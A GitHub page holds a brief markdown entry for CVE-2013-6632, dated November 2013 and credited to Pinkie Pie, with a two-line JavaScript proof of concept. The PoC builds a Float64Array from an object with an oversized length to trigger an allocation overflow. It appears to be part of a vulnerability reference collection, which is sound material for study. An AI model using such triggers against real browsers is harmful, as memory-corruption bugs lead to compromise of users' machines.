Skip to content

Latest commit

 

History

History
16 lines (11 loc) · 425 Bytes

CVE-2013-6632.md

File metadata and controls

16 lines (11 loc) · 425 Bytes

CVE-2013-6632

  • Date: Nov 2013
  • Credit: Pinkie Pie

PoC

var hugetempl = {length: 0x24924925};
var huge = new Float64Array(hugetempl);

Reference